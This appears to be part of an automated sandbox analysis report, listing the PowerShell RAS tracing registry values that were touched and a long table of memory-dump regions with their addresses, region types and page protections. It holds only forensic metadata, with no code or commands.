HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2EB0000
|
system
|
page execute and read and write
|
|
|
|
34C0000
|
trusted library allocation
|
page read and write
|
|
|
|
24700000
|
system
|
page execute and read and write
|
|
|
|
2D00000
|
unkown
|
page execute and read and write
|
|
|
|
2BD0000
|
system
|
page execute and read and write
|
|
|
|
85C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
20AF32F0000
|
trusted library allocation
|
page read and write
|
|
|
|
CD15000
|
direct allocation
|
page execute and read and write
|
|
|
|
5918000
|
trusted library allocation
|
page read and write
|
|
|
|
24B70000
|
unclassified section
|
page execute and read and write
|
|
|
|
4C30000
|
trusted library allocation
|
page read and write
|
|
|
|
81C4000
|
heap
|
page read and write
|
||
|
1085000
|
heap
|
page read and write
|
||
|
13B0000
|
unkown
|
page readonly
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
15F5E5D6000
|
heap
|
page read and write
|
||
|
FD0000
|
unkown
|
page read and write
|
||
|
51D2000
|
direct allocation
|
page execute and read and write
|
||
|
8D31000
|
heap
|
page read and write
|
||
|
A20000
|
unkown
|
page readonly
|
||
|
6F00000
|
heap
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
329D000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2B8C000
|
stack
|
page read and write
|
||
|
6D2663F000
|
stack
|
page read and write
|
||
|
51C4000
|
trusted library allocation
|
page read and write
|
||
|
4FBB000
|
trusted library allocation
|
page read and write
|
||
|
2A84000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
74FD000
|
stack
|
page read and write
|
||
|
6E7B000
|
stack
|
page read and write
|
||
|
8E30000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
2ADBF2B9000
|
heap
|
page read and write
|
||
|
2ADBF293000
|
heap
|
page read and write
|
||
|
32CE000
|
heap
|
page read and write
|
||
|
45EE000
|
stack
|
page read and write
|
||
|
86D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D2637E000
|
stack
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
15F5E550000
|
heap
|
page read and write
|
||
|
862E000
|
stack
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF2AB000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2494D000
|
direct allocation
|
page execute and read and write
|
||
|
4B70FB000
|
stack
|
page read and write
|
||
|
80F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
heap
|
page read and write
|
||
|
2ADBF295000
|
heap
|
page read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
72A9000
|
heap
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
7EB9000
|
heap
|
page read and write
|
||
|
72BA000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
8CD0000
|
heap
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
32AE000
|
heap
|
page read and write
|
||
|
7E77000
|
heap
|
page read and write
|
||
|
8CEF000
|
heap
|
page read and write
|
||
|
1F3B9AC4000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF21C000
|
heap
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
||
|
2ADBF2B9000
|
heap
|
page read and write
|
||
|
2ADBF286000
|
heap
|
page read and write
|
||
|
46B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ADBF2E6000
|
heap
|
page read and write
|
||
|
8AD7000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4BD5000
|
remote allocation
|
page execute and read and write
|
||
|
73C8000
|
trusted library allocation
|
page read and write
|
||
|
7520000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
CFAE4FE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
107B000
|
unkown
|
page read and write
|
||
|
20AE30A0000
|
trusted library allocation
|
page read and write
|
||
|
6D25FDE000
|
stack
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
85E0000
|
direct allocation
|
page read and write
|
||
|
6D00000
|
direct allocation
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
45A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
CC5F1FD000
|
stack
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
5059000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF31E000
|
heap
|
page read and write
|
||
|
1090000
|
unkown
|
page readonly
|
||
|
6CFB000
|
stack
|
page read and write
|
||
|
6D50000
|
direct allocation
|
page read and write
|
||
|
32A9000
|
heap
|
page read and write
|
||
|
1F3B7DF0000
|
heap
|
page read and write
|
||
|
4E3E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
242BF000
|
stack
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
8CD9000
|
heap
|
page read and write
|
||
|
2B62000
|
unkown
|
page read and write
|
||
|
2ADC0F90000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB90A000
|
heap
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
20AE3010000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF2DC000
|
heap
|
page read and write
|
||
|
2434D000
|
stack
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
15F5E5BB000
|
heap
|
page read and write
|
||
|
20AE16AF000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8D29000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2BDE000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
unkown
|
page execute read
|
||
|
20AE5009000
|
trusted library allocation
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
565E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
80E0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2E6000
|
heap
|
page read and write
|
||
|
8D36000
|
heap
|
page read and write
|
||
|
E50000
|
unkown
|
page read and write
|
||
|
32E4000
|
heap
|
page read and write
|
||
|
20AE19D5000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
CFAECFE000
|
stack
|
page read and write
|
||
|
1740000
|
unkown
|
page readonly
|
||
|
6D268BE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8CBD000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
243B0000
|
remote allocation
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
52E1000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8A50000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE5127000
|
trusted library allocation
|
page read and write
|
||
|
20AE166F000
|
heap
|
page read and write
|
||
|
1F3B9A01000
|
trusted library allocation
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
8CA8000
|
heap
|
page read and write
|
||
|
849C000
|
stack
|
page read and write
|
||
|
2ADBF2F7000
|
heap
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
2B5F000
|
unkown
|
page read and write
|
||
|
6D2683E000
|
stack
|
page read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
15F5E470000
|
heap
|
page read and write
|
||
|
8D31000
|
heap
|
page read and write
|
||
|
3034000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
8CD9000
|
heap
|
page read and write
|
||
|
457A000
|
trusted library allocation
|
page execute and read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2AF000
|
heap
|
page read and write
|
||
|
7FB0000
|
trusted library allocation
|
page read and write
|
||
|
37B42000
|
system
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB8D0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
C89000
|
unkown
|
page read and write
|
||
|
11E0000
|
unkown
|
page readonly
|
||
|
4585000
|
trusted library allocation
|
page execute and read and write
|
||
|
45D9000
|
unkown
|
page execute and read and write
|
||
|
2ADBF1E0000
|
heap
|
page read and write
|
||
|
69D5000
|
remote allocation
|
page execute and read and write
|
||
|
81AA000
|
heap
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7ECB000
|
heap
|
page read and write
|
||
|
6D2627E000
|
stack
|
page read and write
|
||
|
2ADBF248000
|
heap
|
page read and write
|
||
|
80AC000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
7ED5000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F3B9914000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
heap
|
page read and write
|
||
|
31D9000
|
unkown
|
page execute and read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
747E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B30000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
244C5000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7E9A000
|
heap
|
page read and write
|
||
|
277C000
|
stack
|
page read and write
|
||
|
806E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB28C000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
4FDA000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B38000
|
heap
|
page read and write
|
||
|
4F3C000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF265000
|
heap
|
page read and write
|
||
|
2ADBF295000
|
heap
|
page read and write
|
||
|
6D10000
|
direct allocation
|
page read and write
|
||
|
2442F000
|
stack
|
page read and write
|
||
|
20AE15C0000
|
heap
|
page read and write
|
||
|
80DB000
|
trusted library allocation
|
page read and write
|
||
|
1050000
|
unkown
|
page read and write
|
||
|
476E000
|
stack
|
page read and write
|
||
|
4F5C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
|
2D2F000
|
stack
|
page read and write
|
||
|
24601000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE30C6000
|
heap
|
page read and write
|
||
|
2DB9000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
unkown
|
page read and write
|
||
|
4EFD000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
52FC000
|
unclassified section
|
page read and write
|
||
|
2ADBF2C6000
|
heap
|
page read and write
|
||
|
2ADC0F91000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB7D0000
|
heap
|
page read and write
|
||
|
2ADBF320000
|
heap
|
page read and write
|
||
|
7F97000
|
stack
|
page read and write
|
||
|
50D3000
|
trusted library allocation
|
page read and write
|
||
|
5223000
|
trusted library allocation
|
page read and write
|
||
|
5262000
|
trusted library allocation
|
page read and write
|
||
|
3BD9000
|
unkown
|
page execute and read and write
|
||
|
4582000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
2B5C000
|
unkown
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
2B40000
|
unkown
|
page readonly
|
||
|
10B0000
|
unkown
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
1571000
|
unkown
|
page readonly
|
||
|
6DFA000
|
stack
|
page read and write
|
||
|
46D0000
|
heap
|
page read and write
|
||
|
8CE2000
|
heap
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
32D3000
|
heap
|
page read and write
|
||
|
6D266B7000
|
stack
|
page read and write
|
||
|
20AFB7A9000
|
heap
|
page read and write
|
||
|
6D264FE000
|
stack
|
page read and write
|
||
|
2ADC0B10000
|
heap
|
page read and write
|
||
|
93E000
|
unkown
|
page readonly
|
||
|
6D20000
|
direct allocation
|
page read and write
|
||
|
247A0000
|
heap
|
page read and write
|
||
|
7E86000
|
heap
|
page read and write
|
||
|
C83000
|
unkown
|
page read and write
|
||
|
2CF4000
|
heap
|
page read and write
|
||
|
20AF328F000
|
trusted library allocation
|
page read and write
|
||
|
1F3B7E0D000
|
heap
|
page read and write
|
||
|
575F000
|
stack
|
page read and write
|
||
|
15F5E5B0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2B40000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE370B000
|
trusted library allocation
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
20AF32A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ADE000
|
heap
|
page read and write
|
||
|
2C00000
|
direct allocation
|
page read and write
|
||
|
84DB000
|
stack
|
page read and write
|
||
|
7EC6000
|
heap
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
20AE1630000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
2B7E000
|
stack
|
page read and write
|
||
|
2ADBF286000
|
heap
|
page read and write
|
||
|
30EC000
|
unkown
|
page read and write
|
||
|
7530000
|
trusted library allocation
|
page read and write
|
||
|
6D30000
|
direct allocation
|
page read and write
|
||
|
1090000
|
unkown
|
page readonly
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
6D2750A000
|
stack
|
page read and write
|
||
|
2ADC0FA2000
|
heap
|
page read and write
|
||
|
245C0000
|
direct allocation
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6CBD000
|
stack
|
page read and write
|
||
|
24949000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6D26A3C000
|
stack
|
page read and write
|
||
|
46AC000
|
stack
|
page read and write
|
||
|
20AE3020000
|
heap
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADC0F9A000
|
heap
|
page read and write
|
||
|
2ADBF2B0000
|
heap
|
page read and write
|
||
|
20AE3060000
|
trusted library allocation
|
page read and write
|
||
|
81EF000
|
stack
|
page read and write
|
||
|
2ADBF21C000
|
heap
|
page read and write
|
||
|
32C1000
|
heap
|
page read and write
|
||
|
2F2C000
|
unkown
|
page read and write
|
||
|
8DD0000
|
direct allocation
|
page read and write
|
||
|
6D263FD000
|
stack
|
page read and write
|
||
|
32BB000
|
heap
|
page read and write
|
||
|
20AE5219000
|
trusted library allocation
|
page read and write
|
||
|
20AE30C0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ED2000
|
unkown
|
page read and write
|
||
|
8C2F000
|
unkown
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
5300000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF2DC000
|
heap
|
page read and write
|
||
|
58C1000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2ADBF2DC000
|
heap
|
page read and write
|
||
|
2ADBF25E000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
E61000
|
unkown
|
page readonly
|
||
|
20AE4CB9000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AFB924000
|
heap
|
page read and write
|
||
|
13AE000
|
unkown
|
page read and write
|
||
|
5A36000
|
unclassified section
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2C67000
|
system
|
page execute and read and write
|
||
|
471E000
|
stack
|
page read and write
|
||
|
579E000
|
stack
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
4E7E000
|
stack
|
page read and write
|
||
|
72D0000
|
heap
|
page read and write
|
||
|
4E90000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
A30000
|
unkown
|
page readonly
|
||
|
243EE000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
802D000
|
stack
|
page read and write
|
||
|
20AF3579000
|
trusted library allocation
|
page read and write
|
||
|
589F000
|
stack
|
page read and write
|
||
|
1040000
|
unkown
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
2ADB000
|
heap
|
page read and write
|
||
|
7FC0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
CC5E9FB000
|
stack
|
page read and write
|
||
|
4B71FF000
|
unkown
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
A515000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
326E000
|
heap
|
page read and write
|
||
|
241FC000
|
stack
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
856C000
|
stack
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
50CD000
|
trusted library allocation
|
page read and write
|
||
|
4658000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
24680000
|
heap
|
page read and write
|
||
|
37D5000
|
remote allocation
|
page execute and read and write
|
||
|
E61000
|
unkown
|
page readonly
|
||
|
2ADBF2B5000
|
heap
|
page read and write
|
||
|
24AF1000
|
direct allocation
|
page execute and read and write
|
||
|
20AE3281000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
10E8000
|
heap
|
page read and write
|
||
|
A10000
|
unkown
|
page readonly
|
||
|
502E000
|
direct allocation
|
page execute and read and write
|
||
|
2DAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7E97000
|
heap
|
page read and write
|
||
|
5161000
|
direct allocation
|
page execute and read and write
|
||
|
6D26738000
|
stack
|
page read and write
|
||
|
15F5E6B0000
|
heap
|
page read and write
|
||
|
8CEB000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
945000
|
unkown
|
page read and write
|
||
|
13B0000
|
unkown
|
page readonly
|
||
|
1F3B7DF7000
|
heap
|
page read and write
|
||
|
2ADBF286000
|
heap
|
page read and write
|
||
|
4875000
|
heap
|
page execute and read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
2ADBF2E6000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE34AB000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
48B1000
|
trusted library allocation
|
page read and write
|
||
|
51A5000
|
trusted library allocation
|
page read and write
|
||
|
20AFB6F4000
|
heap
|
page read and write
|
||
|
4DD0000
|
trusted library allocation
|
page read and write
|
||
|
20AE15D0000
|
heap
|
page read and write
|
||
|
6D2748D000
|
stack
|
page read and write
|
||
|
4E12000
|
heap
|
page read and write
|
||
|
1F3B95F0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
24060000
|
heap
|
page read and write
|
||
|
8120000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
245E8000
|
heap
|
page read and write
|
||
|
72A0000
|
heap
|
page read and write
|
||
|
4C80000
|
trusted library allocation
|
page read and write
|
||
|
20AE3210000
|
heap
|
page execute and read and write
|
||
|
E50000
|
unkown
|
page read and write
|
||
|
47AE000
|
stack
|
page read and write
|
||
|
8E20000
|
direct allocation
|
page read and write
|
||
|
325A000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
20AFB7BA000
|
heap
|
page read and write
|
||
|
5039000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ADBF24E000
|
heap
|
page read and write
|
||
|
2CF4000
|
heap
|
page read and write
|
||
|
2B6B000
|
unkown
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
BF0000
|
unkown
|
page readonly
|
||
|
2B07000
|
heap
|
page read and write
|
||
|
E90000
|
unkown
|
page readonly
|
||
|
245C0000
|
direct allocation
|
page read and write
|
||
|
72F4000
|
heap
|
page read and write
|
||
|
20AE16F8000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
1F3B9903000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8CEE000
|
heap
|
page read and write
|
||
|
8CE2000
|
heap
|
page read and write
|
||
|
FD0000
|
unkown
|
page read and write
|
||
|
BE0000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
244BC000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF2E6000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
24820000
|
direct allocation
|
page execute and read and write
|
||
|
2DA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
20AE39B5000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
1F3B7E21000
|
heap
|
page read and write
|
||
|
1F3B9900000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF249000
|
heap
|
page read and write
|
||
|
4F9B000
|
trusted library allocation
|
page read and write
|
||
|
866D000
|
stack
|
page read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
2BD6000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
5098000
|
trusted library allocation
|
page read and write
|
||
|
CFAEBFE000
|
stack
|
page read and write
|
||
|
2B68000
|
unkown
|
page read and write
|
||
|
D715000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
20AE2FF0000
|
trusted library allocation
|
page read and write
|
||
|
8CE2000
|
heap
|
page read and write
|
||
|
32B8000
|
heap
|
page read and write
|
||
|
244C1000
|
heap
|
page read and write
|
||
|
8AC0000
|
direct allocation
|
page read and write
|
||
|
515D000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2427E000
|
stack
|
page read and write
|
||
|
20AFB98A000
|
heap
|
page read and write
|
||
|
5282000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6D265F9000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
B9C000
|
stack
|
page read and write
|
||
|
240FF000
|
stack
|
page read and write
|
||
|
930000
|
unkown
|
page readonly
|
||
|
1F3B7E24000
|
heap
|
page read and write
|
||
|
7E9E000
|
heap
|
page read and write
|
||
|
2ADBF2AF000
|
heap
|
page read and write
|
||
|
8D29000
|
heap
|
page read and write
|
||
|
2AFC000
|
heap
|
page read and write
|
||
|
20AFBB60000
|
heap
|
page read and write
|
||
|
5A1E000
|
stack
|
page read and write
|
||
|
1F3B7CC0000
|
heap
|
page read and write
|
||
|
58DE000
|
stack
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
2C80000
|
remote allocation
|
page execute and read and write
|
||
|
8D2A000
|
heap
|
page read and write
|
||
|
8E00000
|
direct allocation
|
page read and write
|
||
|
2DD5000
|
remote allocation
|
page execute and read and write
|
||
|
1F3B95D0000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
25049000
|
unclassified section
|
page execute and read and write
|
||
|
2ADC1299000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
2ADBF2C2000
|
heap
|
page read and write
|
||
|
2CBE000
|
system
|
page execute and read and write
|
||
|
2B65000
|
unkown
|
page read and write
|
||
|
6D2657E000
|
stack
|
page read and write
|
||
|
1F3B990F000
|
trusted library allocation
|
page read and write
|
||
|
1F3B7BB0000
|
system
|
page execute and read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
20AE30C8000
|
heap
|
page read and write
|
||
|
32E7000
|
heap
|
page read and write
|
||
|
2E12000
|
unkown
|
page read and write
|
||
|
15F5E5D9000
|
heap
|
page read and write
|
||
|
4580000
|
trusted library allocation
|
page read and write
|
||
|
6D2740E000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4FB9000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
FA0000
|
unkown
|
page readonly
|
||
|
52A2000
|
unclassified section
|
page read and write
|
||
|
EB0000
|
heap
|
page read and write
|
||
|
8E10000
|
direct allocation
|
page read and write
|
||
|
20AE3030000
|
trusted library allocation
|
page read and write
|
||
|
947000
|
unkown
|
page readonly
|
